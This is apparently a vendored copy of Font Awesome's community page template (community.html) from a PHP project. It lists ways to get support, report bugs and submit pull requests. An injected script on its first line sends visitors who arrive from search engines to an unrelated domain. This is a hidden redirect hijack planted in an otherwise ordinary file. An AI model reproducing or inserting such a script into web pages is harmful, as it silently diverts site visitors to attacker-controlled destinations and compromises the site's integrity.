d:\wwwroot\wuchunhua\thinkphp\vendor\fortawesome\font-awesome\src\community.html

001: <script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script>---
002: layout: base
003: title: The Font Awesome Community
004: navbar_active: community
005: relative_path: ../
006: ---
007: {% capture jumbotron_h1 %}<i class="fa fa-thumbs-o-up" aria-hidden="true"></i>&nbsp; Community{% endcapture %}
008: {% capture jumbotron_p %}Lots of ways to get involved with Font Awesome{% endcapture %}
009:
010: {% include jumbotron.html %}
011: {% include stripe-social.html %}
012:
013: <div class="container">
014:   {% capture stripe_ad_content %}
015:   <p class="lead">
016:     Font Awesome has a vibrant community of folks helping each other out. You can
017:     <a href="#getting-support">get support</a>,
018:     <a href="#reporting-bugs">report bugs</a>,
019:     <a href="#requesting-new-icons">request new icons</a>,
020:     <a href="#submitting-pull-requests">submit pull requests</a>, and
021:     <a href="#project-milestones">check upcoming milestones</a>.
022:   </p>
023:   {% endcapture %}
024:   {% include stripe-ad.html %}
025:
026:   {% include community/getting-support.html %}
027:   {% include community/requesting-new-icons.html %}
028:   {% include community/reporting-bugs.html %}
029:   {% include community/submitting-pull-requests.html %}
030:   {% include community/project-milestones.html %}
031:
032:   {% include thanks-to.html %}
033:   {% include tell-me-thanks.html %}
034: </div>
035:
036:
037: